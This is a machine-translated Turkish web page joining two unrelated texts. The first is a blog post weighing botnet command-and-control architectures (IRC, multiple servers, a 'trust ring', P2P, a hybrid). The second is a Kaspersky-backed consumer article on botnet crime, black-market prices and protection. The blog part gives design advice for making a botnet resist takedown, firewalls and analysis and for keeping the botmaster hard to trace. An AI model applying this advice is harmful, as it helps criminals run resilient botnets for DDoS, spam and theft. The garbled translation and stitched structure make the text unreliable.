Botnet. Botnet'ler nasıl oluşturulur. Botnet koruması. IRC ağı üzerinden kendi savaş botnet Kontrolümüzü oluşturuyoruz

Eşler arası ağlarda makalemin bir taslağını yayınlamama şaşmamalı. Okuyucu yorumları çok yardımcı oldu. Bu yönde daha fazla çalışmam için bana ilham veren onlardı. Bundan ne çıktı - kesimin altına bakın.

Yazının başlığından da anlaşılacağı gibi bugün sadece botnetlerden bahsedeceğiz. Bir süreliğine dosya alışverişini, proxy ağlarını, eşler arası blogları ve p2p para birimini unutalım.

"Botnet" kelimesi yasa dışı bir şey olarak anlaşılmamalıdır. Bir kullanıcı trafik ve bilgi işlem kaynaklarını bilimsel bir projenin ihtiyaçlarına bağışlamak için gönüllü olarak bir "bot" indirip kurduğunda, bu aynı zamanda bir botnettir. Buna göre, bot yöneticisi mutlaka suçlu değildir. Bilimsel bir projede yer alan 30 bilim insanından oluşan bir grup aynı zamanda bir "botmaster"dır.

1. Bir sunucu aracılığıyla bir botnet'i kontrol etme

Botları yönetmenin en kolay yolu bir irc/http sunucusu çalıştırmaktır. Bu sayede botlar komutları alacak ve onun yardımıyla yürütmelerinin sonucunu gönderecek.

Elimden geldiğince çiziyorum :) Bu durumda bir illüstrasyona gerek olmayabilir ama sizi diğer çizimlerin yaratacağı şoka hazırlamaya karar verdim.

  • Özellikle IRC durumunda çok basit uygulama.
  • Hızlı botlar cevap verir.
  • Hem tüm ağa hem de belirli bir bota komutlar verebilirsiniz.
  • Ağ yüzlerce düğümden oluşuyorsa, onu yönetmek için DalNet'te bir kanal yeterlidir. Daha büyük ağlar için ucuz (yaklaşık 300 ruble / ay) bir web barındırma hizmeti alabilirsiniz.
  • HTTP durumunda-server, güzel bir kullanıcı arayüzünün geliştirilmesini büyük ölçüde basitleştirir. Herhangi bir web hizmetinde bir botnet kullanıyorsak bu önemlidir.
  • Sunucu yükü. En büyük botnetlerdeki düğüm sayısı milyonlarla ölçülür. Böyle bir kalabalığı yönetmek için bir sunucu yeterli değildir.
  • Sunucuya bir şey olursa (ağ hatası, DDoS, veri merkezinde yangın) ağ sonlandırılır.
  • Bir sunucu güvenlik duvarı için kolaydır. Bu, hem sağlayıcı tarafından hem de kullanıcının bilgisayarındaki Kaspersky Lab ürünleri tarafından yapılabilir.
  • Botmaster'ı bulmak nispeten kolaydır. VPN'i bir kez unuttum - üniformalı misafirleri bekleyin.
  • IRC durumunda, ekipler yalnızca çevrimiçi olarak bot alır. Bir bot komut gönderdikten iki dakika sonra bir kanala girerse, "konu dışı" olacaktır.
  • Botların sayısı ve IP'leri IRC kanalına gidilerek belirlenebilir. Kanalı bir şifre ile korumak yardımcı olmaz, çünkü şifreyi botun kodundan seçmek kolaydır.

2. IRC ağı üzerinden yönetim

Önceki yöntemin dezavantajlarıyla mücadele etmek için mantıklı bir adım, bir sunucu değil, birkaç sunucu yapmaktır. Bence bunu yapmanın en kolay yolu IRC ağınızı kurmaktır. Bu durumda, sunucular arasında veri aktarımının tüm sorumluluğu IRC protokolüne düşer. Botlar açısından, önceki çözüme kıyasla hiçbir fark olmayacak.

  • Basit uygulama, ancak sunucuları kurmakla uğraşmanız gerekecek.
  • Botlar hala komutlara hızlı yanıt veriyor.
  • Yine de belirli bir bota komut verebilirsiniz.
  • Sunucular arasında yük dengeleme, DDoS ve mücbir sebep koruması. Bir milyon bottan oluşan bir ağ için bir düzine iyi sunucu yeterli olabilir.
  • Sunuculardan bazıları başarısız olursa, onları değiştirmek için zamanınız olabilir.
  • IRC kullanılıyorsa ve bir kanalda oturan bin bot tarafından karıştırılıyor, birden fazla kanal kullanıyor. Buna göre, ağın farklı bölümlerine farklı görevler verilebilir.
  • Sunucu / VDS için ayrılmamız gerekecek.
  • Tüm sunucuları aynı anda ateşleyebilirsiniz ve bot yöneticisinin onları değiştirmek için zamanı olmaz.
  • Botmaster'ı takip etmek hala yeterince kolay.
  • IRC durumunda, botların sayısı ve IP'leri hala görünürde.
  • Kanala yeni giren botlar konu dışı.

Güven (güven halkası) terimini ilk olarak bir önceki gönderiye yapılan yorumlarda Nickolas arkadaşımdan duydum. Botnet'in bir bölümüne "sunucuların" işlevini atamakla ilgilidir.

  • Sunuculara gerek yok.
  • Trastring, yüzlerce düğümden oluşabilir. Bu kadar çok irc/http sunucusunu kurmak ve izlemek kolay değil.
  • Botlar, her zaman kanal bağlantısını sürdürmek zorunda değildir. Yeni komutlar için her 5-10 dakikada bir kontrol etmek yeterlidir. Her takımın güvende saklandığı bir TTL'si olmalıdır.
  • Çok sayıda "sunucu", her türlü felakete ağ esnekliği sağlar. Yüzüğün bir kısmı öldüğünde, bot yöneticisi yeni bir güven oluşturma komutunu verebilir. Veya halkanın düğümleri bunu yapabilir (dijital imzalar ve belirli bir güven yüzdesinin onayı gerekir).
  • Kanalın 512 düğümden oluştuğunu, en az %50'sinin sürekli çevrimiçi olduğunu varsayalım. Ağda 1.000.000 bot varsa ve bunların her biri sürekli çevrimiçiyse, her güvenen düğüm için 4.000'den az bot olacaktır. Bot her 10 dakikada bir komut istediğinde (veya sonucu gönderirken), halkanın her düğümü aynı anda ortalama 7 bağlantı işleyecektir. Bu boyutta bir ağ için fazla değil, değil mi?
  • Tüm botların tam listesi yalnızca bir bot yöneticisi tarafından elde edilebilir.
  • Belirli bir bota veya bir grup bota komut verebilirsiniz.
  • Botların komutlara hızlı tepki vermesi.
  • Botmaster'ı bulmak zor.

Gördüğüm tek dezavantaj, uygulamanın karmaşıklığıdır.

4. Eşler arası ağlar

İnternet kaynaklarına göre P2P botnet'ler şu sıralar çok popüler. Bu kaynaklar arasında en büyük ilgiyi hak ediyor. Böyle bir ağın her düğümü yalnızca birkaç "komşu" düğümü bilir. Botmaster, birkaç ağ düğümüne komutlar gönderir, ardından komşudan komşuya iletilir.

Komşuların listesi, özel bir sunucuda bir kez botlara verilir. Bu, örneğin, saldırıya uğramış bir site olabilir. Sunucu başka hiçbir şey yapmaz, yalnızca botnet'e düğüm eklerken gereklidir.

  • Uygulama, önceki paragraftan biraz daha basittir.
  • Tüm ağ düğümlerinde minimum yük. Botnet'in boyutu pratik olarak sınırsızdır.
  • DDoS, ana bilgisayar kesintileri vb. Bir p2p botnetine güvenlik duvarı uygulamak neredeyse imkansızdır.
  • IRC'de olduğu gibi kalıcı bağlantı yok.
  • Uzun sürmese de bir sunucuya ihtiyacınız var.
  • Düğümler zaman zaman ölür ve bu da ağın bağlantısını etkiler.
  • Tüm botların bir listesini almak için, örneğin, onlara belirli bir siteye erişmelerini söylemeniz gerekir. Bu durumda, listeyi yalnızca bot yöneticisinin alacağının garantisi yoktur.
  • Belirli bir düğüme komut vermek için ya tüm ağa göndermeniz ya da doğrudan düğüme bağlanmanız gerekir.
  • Botların komutlara yavaş tepki vermesi.
  • Örneğin, bir URL listesiyle "uzun" bir komut göndermek için üçüncü taraf bir sunucu kullanmanız gerekir, aksi takdirde botların tepkisi daha da yavaşlar.
  • Bir tür sunucunun kullanılması nedeniyle Botmaster'ı bulmak önceki örnekten daha kolaydır.

Elbette yanılıyor olabilirim ama bence p2p botnet'ler güvenmekten çok daha kötü. Belki de antivirüs satıcıları bir şey hakkında sessiz kalıyorlar?

5. Karmaşık çözüm

Yeni ve iyi bir şey icat etmenin bir yolu, eski bir şeyi geçmektir. Bir telefon, bir bilgisayar, bir teyp, bir kamera ve bir video kamerayı birleştirdik - bir akıllı telefonumuz var. Arabadaki bilgisayar ve klima kontrolü kimseyi şaşırtmayacak. Her yoğurda bir buzdolabı mıknatısı yapıştırın ve satışlar fırlayacak.

Başarısız geçiş durumunda değersiz bir birey alabileceğimizi hatırlamak önemlidir. Genetik algoritmalara benziyor, değil mi? Görünüşte iyi bir fikir alalım - komşuları atamaktan güvenin sorumlu olduğu eşler arası bir botnet. O zaman herhangi bir sunucuya ihtiyacımız yok!

Ancak bu durumda, uygulamanın karmaşıklığı az da olsa artacaktır. p2p botnet'in geri kalan sorunları çözülmeden kalacaktır. Galibiyet önemsiz, skor 1: 1.

Bir parça kağıt ve kalemle biraz oturduktan sonra aklıma şu fikir geldi. Bildiğim kadarıyla daha önce hiç seslendirilmedi ve böyle bir şeyi ilk icat eden benim. ChSV artı 100.

Ağın iki durumu varsa - "aktif" ve "pasif". Pasif durumda, botnet p2p temelinde çalışır. Botmaster "birlikleri harekete geçirmek" için bir komut gönderir ve ağ bir güvene dönüşür. Bot yöneticisi, ekibinde güvenin düğümlerini ve ağın durumunu değiştirdiği zamanı belirtmelidir. Yüzüğü büyütmek için birkaç bota komşularına isim vermelerini söyleyebilirsiniz. Ayrıca, tüm komutlar kanal üzerinden iletilir. Ayrıca yeni düğümlere "komşular" atamaktan da sorumludur. Daha sonra halkanın TTL'sinin yetersiz olduğu ortaya çıkarsa, "aktif durumu genişlet" komutu verilebilir.

Böyle bir botnet, p2p ağının tek bir eksisini devralmayacak ve aşağıdakilerin yanı sıra tüm güven artılarına sahip olacaktır:

  • Bir p2p ağı gibi ddos ​​saldırılarına ve ağ filtrelerine karşı artan direnç.
  • Ağ kesintisi sırasında botlar tarafından minimum kaynak tüketimi. Bot yöneticisinin güvenin durumunu izlemesi ve bunun için yeni düğümler seçmesi gerekmez.
  • Bir güven oluştururken, yalnızca şu anda çevrimiçi olan düğümler seçilir. Botlar ilk denemede (bir süreliğine) ringe bağlanacaktır.
  • "Komşular" listesi periyodik olarak güncellenir. Aynı şekilde, tüm botnet, geçici halkaya dahil olan düğümlerin IP'sini bilir. Bu yüzden, gerçek komşulardan bazıları ağda uzun süre görünmediyse, bu düğümleri komşu olarak görmelerine izin verin.

Ve burada gördüğüm tek dezavantaj, uygulamanın karmaşıklığı. Ama bu gerçekten bir sorun değil.

6. Hatırlanması gereken önemli

Şimdiye kadar, bazı noktalar hakkında sessiz kaldım, çünkü bunlar, bir botnet'i yönetmek için yukarıdaki yöntemlerden herhangi birinin doğasında var. Onlara odaklanmalısın.

  • Bazı ana bilgisayarlar, güvenlik duvarı veya NAT nedeniyle gelen bağlantıları kabul edemez. En azından, bir bot yazarken bu dikkate alınmalıdır. Örneğin, bir p2p ağında komutları dağıtırken, botun kendisi periyodik olarak komşularıyla iletişim kurmalı ve onlardan bir komut beklememelidir.
  • Ağa gönderilen tüm komutların dinlendiği varsayılmalıdır. En azından ilgili taraf, bu amaç için botun kodunu değiştirebilir. Ancak, ağdaki tüm trafiği şifrelemek mantıklıdır. En azından bu, botnet analizini karmaşıklaştıracaktır.
  • Tüm botmaster komutları dijital olarak imzalanmalıdır. Şifreler iyi değildir çünkü ele geçirilebilirler.
  • Uygulama hakkında konuştuğumuz için, herhangi bir botnet'te en az üç komutun sağlanması gerektiğini not ediyorum - botları güncellemek, bot yöneticisinin anahtarını güncellemek ve tüm ağın kendi kendini imha etmesi.
  • Ağda "casus" düğümler var. Bazıları güvene dahildir. Aynı zamanda, bu "casusların" takip ettiği hedefleri bilmiyoruz - bu, bot yöneticisinin IP'sinin tanımlanması, komut yürütmesinin kesintiye uğraması, ağın devre dışı bırakılması, botnet üzerinde kontrolün ele geçirilmesi vb. olabilir. Özellikle bu, botların bir halkaya bağlanırken rastgele bir düğüm seçmesi ve her zaman aynı düğümü kullanmaması gerektiği anlamına gelir.
  • Şekilde, güven düğümleri birbirine bağlıdır, ancak halkayı küçük bir p2p ağı şeklinde, yani "komşular" ilkesine göre uygulamak çok daha pratiktir.

Ayrıca, 1. ve 2. çözümlerin (sunucu, birçok sunucu) birçok dezavantajdan yoksun olduğunu ve HTTP protokolünü kullanırken çözüm 3'ten (trunking) birkaç avantaj elde ettiğini de not ediyorum. Ne demek istediğimi anlamak için bu noktaları tekrar gözden geçirin.

7. Sonuçlar

Küçük ağlar için IRC iyi bir çözümdür. Örneğin, dağıtık bilgi işlem için kendi küçük ağınızı oluşturmak istiyorsanız, ev bilgisayarınıza, dizüstü bilgisayarınıza, netbook'unuza, iş bilgisayarınıza (şirket politikası izin veriyorsa) bir bot kurun ve ağı DalNet üzerinden yönetin. Gerekirse, daha sonra ağ bir güvene "pompalanabilir". Uygun komutu vereceksin, değil mi?

Bir botnet güzel bir web arayüzüne ihtiyaç duyuyorsa, web sunucusundan komutları alıp IRC'ye gönderecek ek bir program yazmak mantıklı olabilir. En azından bu yaklaşımı düşünün.

Evrensel çözümler güveniyor ve p2p + güveniyor. Bu tür ağlar, herhangi bir sunucu olmadan, 1 veya 1.000.000, kaç düğüme sahip olurlarsa olsunlar mükemmel bir şekilde çalışacaktır.

"Saf p2p"nin halka ile karşılaştırıldığında bariz dezavantajları olduğu için, neden iyi bir çözüm olarak kabul edildiği bana açık değil. Ağı oluşturan botların elbette birçok faydalı özelliği vardır. Neden bir küçük yük daha eklemiyorsunuz - güven içinde ağ seferberliği?

Muhtemelen hepsi bu. Herhangi bir yorumunuzdan memnun olurum. Özellikle eleştiri, metindeki yanlışlık/çelişki belirtileri ve konuyla ilgili fikirleriniz gündeme geldi.

Botnet'ler günümüzde siber suçlular için ana araçlardan biri haline geldi. ComputerBild size botnetlerin ne olduğunu, nasıl çalıştıklarını ve bilgisayarınızı bir zombi ağına düşmekten nasıl kurtaracağınızı söyleyecektir.

Botnet veya zombi ağı, saldırganların sahiplerinin bilgisi olmadan diğer kişilerin makinelerini uzaktan kontrol etmelerine olanak tanıyan kötü amaçlı yazılım bulaşmış bilgisayarlardan oluşan bir ağdır. Son yıllarda zombi ağları, siber suçlular için istikrarlı bir gelir kaynağı haline geldi. Botnet'leri yönetmek için gereken sürekli düşük maliyetler ve minimum bilgi, popülerliğin ve dolayısıyla botnet sayısının artmasına katkıda bulunur. Saldırganlar ve müşterileri, zombi ağları kullanılarak gerçekleştirilen DDoS saldırılarından veya spam postalarından binlerce dolar kazanıyor.

Bilgisayarıma bot mu bulaştı?

Bu sorunun cevabı kolay değil. Gerçek şu ki, herhangi bir şekilde sistemin performansını etkilemediği için, bir bilgisayarın günlük çalışmasında botların müdahalesini izlemek neredeyse imkansızdır. Bununla birlikte, sistemde bir bot olduğunu belirleyebileceğiniz birkaç işaret vardır:

Bilinmeyen programlar, periyodik olarak öfkeli bir şekilde güvenlik duvarı veya anti-virüs yazılımı bildiren İnternet'e bağlantı kurmaya çalışıyor;

Web'i çok dikkatli kullanmanıza rağmen, İnternet trafiği çok artıyor;

Çalışan sistem işlemleri listesinde, sıradan Windows işlemleri gibi görünen yenileri görünür (örneğin, bir bot scvhost.exe olarak adlandırılabilir - bu ad, Windows sistem işlemi svchost.exe'nin adına çok benzer; daha çok farkı fark etmek zor, ama mümkün).

Botnet'ler neden oluşturulur?

Botnetler para kazanmak için yaratılır. Zombi ağlarının ticari olarak karlı kullanımının birkaç alanı vardır: DDoS saldırıları, gizli bilgilerin toplanması, spam gönderme, kimlik avı, arama motoru spam'i, hile tıklama sayaçları, vb. Unutulmamalıdır ki, saldırgan ne seçerse seçsin, herhangi bir yön olacaktır. karlı bir botnet, listelenen tüm faaliyetlerin aynı anda gerçekleştirilmesine izin verir.

DDoS saldırısı (Dağıtılmış Hizmet Reddi), bir bilgisayar sistemine, örneğin bir web sitesine, amacı sistemi bir "çökme" durumuna getirmek olan bir saldırıdır. artık meşru kullanıcıların isteklerini kabul etme ve işleme. DDoS saldırısı gerçekleştirmenin en yaygın yöntemlerinden biri, kurbanın bilgisayarına veya sitesine çok sayıda istek göndermektir ve bu, saldırıya uğrayan bilgisayarın kaynakları gelen tüm istekleri işlemek için yetersizse hizmet reddine yol açar. DDoS saldırıları, bilgisayar korsanları için zorlu bir silahtır ve bir botnet, bunları gerçekleştirmek için ideal bir araçtır.

DDoS saldırıları hem haksız rekabet aracı hem de siber terör eylemleri olabilir. Botnet sahibi, çok titiz olmayan herhangi bir girişimciye, rakibinin web sitesinde bir DDoS saldırısı gerçekleştirmesi için bir hizmet sağlayabilir. Böyle bir yükten sonra, saldırıya uğrayan kaynak "yatacak", saldırının müşterisi geçici bir avantaj elde edecek ve siber suçlu mütevazı (ya da öyle değil) bir ödül alacak.

Aynı şekilde, botnet sahipleri de büyük şirketlerden para sızdırmak için DDoS saldırılarını kullanabilirler. Aynı zamanda, başarılı DDoS saldırılarının sonuçlarının ortadan kaldırılması çok pahalı olduğu için şirketler siber suçluların gereksinimlerine uymayı tercih ediyor. Örneğin, Ocak 2009'da en büyük barındırma sağlayıcılarından biri olan GoDaddy.com, bir DDoS saldırısına maruz kaldı ve bunun sonucunda sunucularında barındırılan binlerce site neredeyse bir gün boyunca kullanılamadı. Ev sahibinin mali kayıpları çok büyüktü.

Şubat 2007'de, kök DNS sunucularına, tüm İnternet'in normal işleyişini doğrudan etkileyen bir dizi saldırı gerçekleştirildi. Bu saldırıların amacının World Wide Web'in çöküşü olması muhtemel değildir, çünkü zombi ağlarının varlığı ancak İnternet varsa ve normal çalışıyorsa mümkündür. Her şeyden önce, zombi ağlarının gücünün ve yeteneklerinin bir gösterisine benziyordu.

DDoS saldırı hizmetlerine ilişkin reklamlar, ilgili konunun birçok forumunda açıkça yayınlanmaktadır. Saldırı fiyatları, bir DDoS botnet'in sürekli çalışması için günde 50 ila birkaç bin dolar arasında değişmektedir. www.shadowserver.org web sitesine göre, 2008 yılında siber suçluların yaklaşık 20 milyon dolar kazanabildiği yaklaşık 190.000 DDoS saldırısı gerçekleştirildi. Doğal olarak, bu miktar, hesaplanması imkansız olan şantajdan elde edilen geliri içermez.

Gizli bilgilerin toplanması

Kullanıcıların bilgisayarlarında saklanan gizli bilgiler her zaman davetsiz misafirleri çekecektir. En çok ilgi çekenler kredi kartı numaraları, finansal bilgiler ve çeşitli hizmetler için parolalardır: posta kutuları, FTP sunucuları, anlık mesajlaşma programları vb. Aynı zamanda, modern kötü amaçlı programlar saldırganların tam olarak kendilerini ilgilendiren verileri seçmelerine izin verir - ihtiyaç duydukları her şeyi yapmak, PC'ye karşılık gelen modüle yüklemektir.

Saldırganlar çalınan bilgileri satabilir veya kendi avantajları için kullanabilir. Her gün sayısız çevrimiçi forumda banka hesaplarının satışı için yüzlerce reklam çıkıyor. Bir hesabın maliyeti, kullanıcının hesabındaki para miktarına bağlıdır ve hesap başına 1 ABD Doları ile 1.500 ABD Doları arasında değişmektedir. Alt sınır, bu tür işletmelerdeki siber suçluların rekabet sırasında fiyatları düşürmeye zorlandıklarını gösterir. Çok para kazanmak için sürekli taze veri akışına ihtiyaçları var ve bu da zombi ağlarının istikrarlı bir şekilde büyümesini gerektiriyor. Mali bilgiler, özellikle banka kartlarında sahtecilik yapan siber suçlular olan kartçılar için ilgi çekicidir.

Bu tür operasyonların ne kadar karlı olduğu, iki yıl önce tutuklanan bir grup Brezilyalı siber suçlunun iyi bilinen hikayesinden anlaşılabilir. Bilgisayarlardan çalınan bilgileri kullanarak sıradan kullanıcıların banka hesaplarından 4,74 milyon dolar çekmeyi başardılar. Kullanıcının parasıyla doğrudan ilgili olmayan kişisel verilerin elde edilmesi, sahtecilik, sahte banka hesapları açma, yasa dışı işlemler yapma vb. işlerle uğraşan suçluları da ilgilendirmektedir.

Botnet'ler tarafından toplanan başka bir bilgi türü de e-posta adresleridir ve kredi kartı numaraları ve hesap numaralarının aksine, virüslü bir bilgisayarın adres defterinden birçok e-posta adresi çıkarılabilir. Toplanan adresler satışa sunulur ve bazen "ağırlıkça" - megabayt olarak. Böyle bir "ürünün" ana alıcıları spam göndericilerdir. Bir milyon e-posta adresi listesinin maliyeti 20 ila 100 dolar arasındadır ve spam gönderenler tarafından sipariş edilen aynı milyon adrese postalama 150-200 dolar arasındadır. Faydaları açıktır.

Suçlular ayrıca çeşitli ücretli hizmetlerin ve çevrimiçi mağazaların hesaplarıyla da ilgilenmektedir. Tabii ki, banka hesaplarından daha ucuzlar, ancak bunların uygulanması, kolluk kuvvetleri tarafından daha düşük taciz riskiyle ilişkilendiriliyor.

Milyonlarca spam mesajı her gün dünyayı dolaşıyor. İstenmeyen posta göndermek, modern botnet'lerin ana işlevlerinden biridir. Kaspersky Lab'e göre, tüm spam'lerin yaklaşık %80'i zombi ağları üzerinden gönderiliyor. Yasalara uyan kullanıcıların bilgisayarlarından, Viagra reklamları, pahalı saatlerin kopyaları, çevrimiçi kumarhaneler vb. ile iletişim kanallarını ve posta kutularını tıkayan milyarlarca mektup gönderilir. Böylece, bilgisayar korsanları masum kullanıcıların bilgisayarlarını tehlikeye atıyor: postalamanın gerçekleştirildiği adresler, virüsten koruma şirketlerinin kara listelerine giriyor.

Son yıllarda, spam hizmetlerinin alanı genişledi: ICQ spam, sosyal ağlarda spam, forumlar ve bloglar ortaya çıktı. Ve bu aynı zamanda botnet sahiplerinin bir "değeri": sonuçta, "Facebook'ta Spam" gibi sloganlarla yeni işlerin ufkunu açan bot istemcisine ek bir modül eklemek zor değil. Ucuz ". Spam fiyatları hedef kitleye ve gönderilen adres sayısına göre değişiklik göstermektedir. Hedeflenen postalar için fiyat aralığı - yüz binlerce adres için 70 dolardan on milyonlarca adres için 1.000 dolara kadar. Geçen yıl boyunca, spam gönderenler postalamadan yaklaşık 780 milyon dolar kazandılar.

Arama spam'i oluşturma

Botnet kullanmanın bir başka seçeneği de sitelerin arama motorlarındaki popülaritesini artırmaktır. Arama motoru optimizasyonu üzerinde çalışırken, kaynak yöneticileri sitenin arama sonuçlarındaki konumunu yükseltmeye çalışırlar, çünkü ne kadar yüksek olursa, arama motorları aracılığıyla siteye o kadar fazla ziyaretçi gelir ve bu nedenle site sahibi o kadar fazla gelir elde eder. örneğin, web sayfalarındaki reklam alanlarının satışından alacaktır. Birçok şirket, sitelerini "arama motorlarında" ilk sıralara getirmek için web yöneticilerine çok para ödüyor. Botnet sahipleri, onların bazı hilelerini gözetledi ve arama motoru optimizasyon sürecini otomatik hale getirdi.

LiveJournal'daki girişinize veya bir fotoğraf barındırmada yayınlanan başarılı bir fotoğrafa yapılan yorumlarda, bilinmeyen bir kişi tarafından ve bazen de "arkadaşınız" tarafından oluşturulan birçok bağlantı gördüğünüzde şaşırmayın: sadece birisi promosyonunu emretti. sahiplerine olan kaynakları botnet. Özel olarak oluşturulmuş bir program bir zombi bilgisayara yüklenir ve sahibi adına, tanıtılan siteye bağlantılar içeren popüler kaynaklar hakkında yorumlar bırakır. Yasadışı arama spam hizmetleri için ortalama fiyat ayda yaklaşık 300 dolar.

Kişisel verilerin maliyeti nedir?

Çalınan kişisel verilerin maliyeti, doğrudan hak sahibinin yaşadığı ülkeye bağlıdır. Örneğin, ABD'de ikamet eden birinin tam verileri 5-8 dolara mal oluyor. Karaborsada, Avrupa Birliği sakinlerinden gelen veriler özellikle değerlidir - Amerika Birleşik Devletleri ve Kanada vatandaşlarından gelen verilerden iki ila üç kat daha pahalıdır. Bu, bu tür verilerin herhangi bir AB ülkesindeki suçlular tarafından kullanılabilmesi ile açıklanabilir. Dünyada ortalama olarak, bir kişi hakkında komple bir veri paketinin fiyatı yaklaşık 7 $ 'dır.

Ne yazık ki, sıfırdan bir botnet düzenlemeye karar veren herkes, İnternette bir zombi ağının nasıl oluşturulacağına ilişkin talimatları bulmayı kolay bulacaktır. İlk adım: yeni bir zombi ağı oluşturun. Bunu yapmak için, kullanıcıların bilgisayarlarına özel bir program olan bir bot bulaştırmanız gerekir. Bulaşma için spam postalar, forumlarda ve sosyal ağlarda mesaj gönderme ve diğer teknikler kullanılır; genellikle, bir bot, virüsler veya solucanlar gibi kendi kendine yayılan bir işleve sahiptir.

Potansiyel bir kurbanın bot yüklemesini sağlamak için sosyal mühendislik teknikleri kullanılır. Örneğin, özel bir codec bileşeni indirmeniz gereken ilginç bir video izlemeyi teklif ediyorlar. Böyle bir dosyayı indirip çalıştırdıktan sonra, kullanıcı elbette hiçbir videoyu izleyemeyecek ve büyük olasılıkla herhangi bir değişiklik fark etmeyecek ve bilgisayarına virüs bulaşacak ve tüm komutları yerine getiren mütevazı bir hizmetçi olacak. botnet sahibinin.

Bot istilasının ikinci yaygın olarak kullanılan yöntemi, indirerek sürmektir. Bir kullanıcı virüslü bir web sayfasını ziyaret ettiğinde, uygulamalardaki çeşitli "delikler" aracılığıyla bilgisayarına kötü amaçlı kod indirilir - özellikle popüler tarayıcılarda. Zayıflıklardan yararlanmak için özel programlar kullanılır - istismarlar. Sadece farkedilmeden indirmeye değil, aynı zamanda fark edilmeden bir virüs veya bot başlatmaya da izin veriyorlar. Bu tür kötü amaçlı yazılım dağıtımı en tehlikeli olanıdır, çünkü popüler bir kaynak saldırıya uğrarsa on binlerce kullanıcıya virüs bulaşır!

Bot, bilgisayar ağları üzerinden kendi kendine yayılma işlevi ile donatılabilir. Örneğin, mevcut tüm yürütülebilir dosyalara bulaşarak veya ağdaki savunmasız bilgisayarları arayıp bulaştırarak yayılabilir.

Şüphelenmeyen kullanıcıların virüslü bilgisayarları, botnet'in komuta merkezi aracılığıyla botnet oluşturucu tarafından izlenebilir, botlarla bir IRC kanalı, web bağlantısı veya diğer herhangi bir yolla iletişim kurabilir. Botnet'in sahibine gelir getirmeye başlaması için birkaç düzine makineyi bir ağa bağlamak yeterlidir. Üstelik bu gelir, zombi ağının istikrarına ve büyüme hızına doğrusal olarak bağlıdır.

Çevrimiçi PPC (Tıklama Başına Ödeme) reklam şirketleri, çevrimiçi reklamlardaki bağlantılara yapılan benzersiz tıklamalar için para öder. Botnet sahipleri için bu tür şirketleri aldatmak kazançlı bir iştir. Örnek olarak iyi bilinen Google Adsense ağını alın. Giren reklamcılar, "ışığına" bakan kullanıcının onlardan bir şeyler satın alacağı umuduyla, yerleştirilen reklamlara yapılan tıklamalar için Google'a ödeme yapar.

Google, buna karşılık, Adsense programına katılan çeşitli sitelere içeriğe dayalı reklamlar yerleştirir ve site sahibine her tıklamanın bir yüzdesini öder. Ne yazık ki, tüm site sahipleri dürüst değildir. Bir zombi ağıyla, bir bilgisayar korsanı, Google'da çok fazla şüphe uyandırmamak için her makineden bir tane olmak üzere günde binlerce benzersiz tıklama oluşturabilir. Böylece reklam kampanyasına harcanan para hacker'ın cebine akacaktır. Ne yazık ki, birinin bu tür eylemlerden sorumlu tutulduğu tek bir vaka olmadı. Click Forensics'e göre, 2008 yılında, reklam bağlantılarına yapılan tüm tıklamaların yaklaşık %16-17'si sahteydi ve bunların en az üçte biri botnet'ler tarafından oluşturuldu. Bazı basit hesaplamalar yaptıktan sonra, geçen yıl botnet sahiplerinin 33 milyon doları "tıkladığı" anlaşılabilir. Fare tıklamalarından kötü bir gelir değil!

Saldırganlar ve dürüst olmayan işadamları kendi başlarına sıfırdan bir botnet oluşturmak zorunda değiller. Bilgisayar korsanlarından her boyutta ve performansta botnet satın alabilir veya kiralayabilirler - örneğin, özel forumlarla iletişim kurarak.

Hazır bir botnetin maliyeti ve onu kiralamanın maliyeti, doğrudan içerdiği bilgisayar sayısına bağlıdır. Hazır botnetler en çok İngilizce forumlarda popülerdir.

Birkaç yüz bot içeren küçük botnetlerin maliyeti 200 ila 700 dolar arasındadır. Aynı zamanda, bir botun ortalama fiyatı yaklaşık 50 senttir. Daha büyük botnetler çok paraya mal olur.

Birkaç yıl önce Hollandalı 19 yaşındaki bir bilgisayar korsanı tarafından oluşturulan Zombi ağı Shadow, 25.000 Euro'ya satılan dünya çapında 100 binden fazla bilgisayardan oluşuyordu. Bu para için İspanya'da küçük bir ev satın alabilirsiniz, ancak Brezilya'dan bir suçlu bir botnet satın almayı seçti.

Botnet koruması

1. Her şeyden önce, bunlar düzenli olarak güncellenen veritabanlarıyla İnternet tehditlerine karşı koruma sağlayan anti-virüs programları ve karmaşık paketlerdir. Sadece tehlikeyi zamanında tespit etmeye değil, aynı zamanda sadık “demir dostunuz” bir zombiye dönüşmeden önce onu ortadan kaldırmaya yardımcı olacaklar, spam göndermeye veya siteleri “bırakmaya” başlamadan önce. Karmaşık paketler, örneğin Kaspersky Internet Security 2009, ortak bir komuta merkezi aracılığıyla yönetilebilen eksiksiz bir güvenlik özellikleri seti içerir.

Virüsten koruma motoru, arka planda kritik sistem alanlarını tarar ve olası tüm virüs izinsiz girişlerini izler: e-posta ekleri ve potansiyel olarak tehlikeli web siteleri.

Güvenlik duvarı, kişisel bilgisayar ile İnternet arasındaki iletişimi izler. İnternet'ten alınan veya İnternet'e gönderilen tüm veri paketlerini kontrol eder ve gerekirse ağ saldırılarını engeller ve kişisel verilerin İnternet'e gizlice iletilmesini engeller.

Spam filtresi, posta kutunuzu reklam mesajlarının sızmasına karşı korur. Görevleri arasında, siber suçluların kullanıcıdan giriş bilgileri hakkında çevrimiçi ödeme veya bankacılık sistemlerine bilgi sızdırmaya çalıştığı kimlik avı e-postalarının belirlenmesi de yer alıyor.

2. Geliştiricilerin birçok güvenlik açığını ve ayrıca saldırganlar tarafından kullanılan zayıflıkları keşfedip düzelttiği işletim sistemi, web tarayıcıları ve diğer uygulamaların düzenli güncellemeleri.

3. Özel şifreleme programları, bot bilgisayarınıza girmiş olsa bile, kişisel verilerinizi koruyacaktır, çünkü ona erişmek için şifreyi kırmak zorunda kalacaktır.

4. Sağduyu ve dikkat. Verilerinizi her türlü tehdide karşı korumak istiyorsanız, kaynağı bilinmeyen programları indirip kurmamalı, antivirüs uyarılarına rağmen dosyalar içeren arşivleri açmamalı, tarayıcının tehlikeli olarak işaretlediği sitelere girmemelisiniz vb.

Malzemenin hazırlanmasındaki yardımları için Kaspersky Lab'a teşekkür ederiz.

Güvenlik sistemleri sürekli geliştirilmekte, programcılar daha deneyimli hale gelmektedir. Artık daha az ve daha az bilinen hata yapılıyor.

[prolog]
